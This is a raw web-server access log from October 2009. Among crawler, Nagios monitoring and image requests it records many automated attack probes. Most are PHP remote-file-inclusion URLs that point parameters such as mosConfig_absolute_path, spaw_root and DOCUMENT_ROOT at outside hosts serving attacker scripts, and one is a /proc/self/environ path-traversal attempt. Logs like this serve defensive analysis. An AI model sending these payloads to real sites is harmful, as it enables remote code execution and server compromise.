81.12.13.152 - - [12/Oct/2009:03:09:18 -0400] "GET /logs/access_log.Q109062000//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:03:10:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.43.216 - - [12/Oct/2009:03:11:27 -0400] "GET /logs/access_log.Q109092600//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:03:12:00 -0400] "GET /logs/error_log.Q108082500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.7.118 - - [12/Oct/2009:03:15:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [12/Oct/2009:03:16:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.53.83.238 - - [12/Oct/2009:03:16:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.53.83.238 - - [12/Oct/2009:03:16:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.53.83.238 - - [12/Oct/2009:03:16:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.53.83.238 - - [12/Oct/2009:03:16:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/marketingmaterials/marketingmaterials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
123.125.66.65 - - [12/Oct/2009:03:16:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
151.1.24.160 - - [12/Oct/2009:03:17:29 -0400] "GET /logs/access_log.Q109090300%20%20/?conteudo=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.200.116.130 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/prev.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.130 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/0032467_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.132 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/cat_link.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.132 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/cat_expand.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.74 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/0032475_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.73 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/0032465_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.72 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/0032464_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.13 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/2000107_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.70 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/0032462_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.71 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/items/0032463_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.14 - - [12/Oct/2009:03:17:41 -0400] "HEAD /images/cat_dot.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [12/Oct/2009:03:21:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [12/Oct/2009:03:26:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.70 - - [12/Oct/2009:03:26:20 -0400] "GET /logs/access_log.Q109063000//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:26:20 -0400] "GET //bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:26:21 -0400] "GET /logs//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:03:26:29 -0400] "GET /logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.78.70 - - [12/Oct/2009:03:26:35 -0400] "GET /logs//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:26:35 -0400] "GET //bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:26:35 -0400] "GET /logs/access_log.Q109063000//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:03:26:30 -0400] "GET /logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.78.70 - - [12/Oct/2009:03:27:03 -0400] "GET /logs/error_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:27:11 -0400] "GET /logs/error_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
205.178.145.65 - - [12/Oct/2009:03:27:26 -0400] "GET /logs/access_log.Q109090400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
205.178.145.65 - - [12/Oct/2009:03:27:29 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
205.178.145.65 - - [12/Oct/2009:03:27:29 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21525 "-" "Mozilla/5.0"
205.178.145.65 - - [12/Oct/2009:03:27:34 -0400] "GET /logs/error_log.Q109090400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:29:52 -0400] "GET //bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:29:52 -0400] "GET /logs//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:29:52 -0400] "GET /logs/error_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:30:05 -0400] "GET /logs/access_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:03:31:43 -0400] "GET /logs/error_log.Q109062200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Oct/2009:03:32:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.199.232.195 - - [12/Oct/2009:03:35:15 -0400] "GET /logs/access_log.Q109081100//skin/uks_gallery_v3020/setup.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
61.199.232.195 - - [12/Oct/2009:03:35:16 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
61.199.232.195 - - [12/Oct/2009:03:35:16 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
61.199.232.195 - - [12/Oct/2009:03:35:45 -0400] "GET /logs/access_log.Q109081000//skin/uks_gallery_v3020/setup.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
61.199.232.195 - - [12/Oct/2009:03:36:11 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/Oct/2009:03:37:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.70 - - [12/Oct/2009:03:37:19 -0400] "GET /logs/error_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:37:19 -0400] "GET //bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:37:19 -0400] "GET /logs//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:37:29 -0400] "GET /logs/access_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
75.125.146.114 - - [12/Oct/2009:03:38:59 -0400] "GET /logs/access_log.Q109062800//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
75.125.146.114 - - [12/Oct/2009:03:38:59 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
75.125.146.114 - - [12/Oct/2009:03:38:59 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
204.202.2.23 - - [12/Oct/2009:03:39:16 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
204.202.2.23 - - [12/Oct/2009:03:39:17 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
204.202.2.23 - - [12/Oct/2009:03:39:17 -0400] "GET /logs/access_log.Q109062800//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
218.150.78.70 - - [12/Oct/2009:03:39:25 -0400] "GET /logs/access_log.Q109063000//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
75.125.146.114 - - [12/Oct/2009:03:39:50 -0400] "GET /logs/error_log.Q109062500//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.810"
204.202.2.23 - - [12/Oct/2009:03:40:16 -0400] "GET /logs/error_log.Q109062500//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.65"
218.150.78.70 - - [12/Oct/2009:03:40:39 -0400] "GET /logs/error_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:40:39 -0400] "GET /logs//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:40:39 -0400] "GET //bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.78.70 - - [12/Oct/2009:03:40:58 -0400] "GET /logs/access_log.Q109070200//bbs//skin/zero_vote/admin.php?dir=http://bavarian-forest-customs.de/neu/images/1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:03:42:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.146.114 - - [12/Oct/2009:03:42:54 -0400] "GET /logs/access_log.Q109062800%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.810"
122.155.5.84 - - [12/Oct/2009:03:43:02 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
122.155.5.84 - - [12/Oct/2009:03:43:02 -0400] "GET /logs/access_log.Q109062800//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
122.155.5.84 - - [12/Oct/2009:03:43:02 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
122.155.5.84 - - [12/Oct/2009:03:43:36 -0400] "GET /logs/error_log.Q109062500//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Oct/2009:03:47:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.202.2.23 - - [12/Oct/2009:03:47:09 -0400] "GET /logs/access_log.Q109062800%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.65"
122.155.5.84 - - [12/Oct/2009:03:49:41 -0400] "GET /logs/access_log.Q109062800%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unibc.ru/.logs/yes.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Oct/2009:03:52:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.206.29.91 - - [12/Oct/2009:03:52:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
200.241.32.194 - - [12/Oct/2009:03:52:51 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:52:51 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:52:54 -0400] "GET /logs/error_log.Q109072300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:52:56 -0400] "GET /logs/access_log.Q109072300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.206.29.91 - - [12/Oct/2009:03:53:13 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
200.241.32.194 - - [12/Oct/2009:03:53:19 -0400] "GET /logs/error_log.Q109052200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:53:19 -0400] "GET /logs/access_log.Q109052500%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:53:41 -0400] "GET /logs/access_log.Q109052200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:53:41 -0400] "GET /logs/access_log.Q109050700%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:54:00 -0400] "GET /logs/error_log.Q109071000%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.206.29.91 - - [12/Oct/2009:03:54:04 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
83.206.29.91 - - [12/Oct/2009:03:54:10 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
83.206.29.91 - - [12/Oct/2009:03:54:17 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
200.241.32.194 - - [12/Oct/2009:03:54:20 -0400] "GET /logs/access_log.Q109071000%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:54:20 -0400] "GET /logs/error_log.Q109081100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.206.29.91 - - [12/Oct/2009:03:54:25 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
83.206.29.91 - - [12/Oct/2009:03:54:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
200.241.32.194 - - [12/Oct/2009:03:54:40 -0400] "GET /logs/error_log.Q109052500%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:55:00 -0400] "GET /logs/error_log.Q109050700%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.206.29.91 - - [12/Oct/2009:03:55:08 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
200.241.32.194 - - [12/Oct/2009:03:55:20 -0400] "GET /logs/error_log.Q109070700%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:55:20 -0400] "GET /logs/access_log.Q109050900%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:55:34 -0400] "GET /logs/access_log.Q109070700%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:55:39 -0400] "GET /logs/access_log.Q109081100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:55:56 -0400] "GET /logs/error_log.Q109090500%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:55:56 -0400] "GET /logs/error_log.Q109050900%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:56:36 -0400] "GET /logs/access_log.Q109060100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:56:36 -0400] "GET /logs/error_log.Q109052400%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:56:50 -0400] "GET /logs/access_log.Q109052400%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:03:56:52 -0400] "GET /logs/access_log.Q109062300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:03:57:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.210.57.83 - - [12/Oct/2009:03:57:49 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
195.210.57.83 - - [12/Oct/2009:03:57:50 -0400] "GET /logs/access_log.Q108081300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
200.241.32.194 - - [12/Oct/2009:04:00:39 -0400] "GET /logs/access_log.Q109062200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:04:00:40 -0400] "GET /logs/error_log.Q109062300%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:04:01:14 -0400] "GET /logs/error_log.Q109062200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:04:01:21 -0400] "GET /logs/access_log.Q109070800%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:04:01:21 -0400] "GET /logs/error_log.Q109081600%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
119.63.193.55 - - [12/Oct/2009:04:01:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.59.12.99 - - [12/Oct/2009:04:02:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.229.58.122 - - [12/Oct/2009:04:03:35 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:04:03:35 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:04:03:36 -0400] "GET /e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:04:03:39 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:04:03:46 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
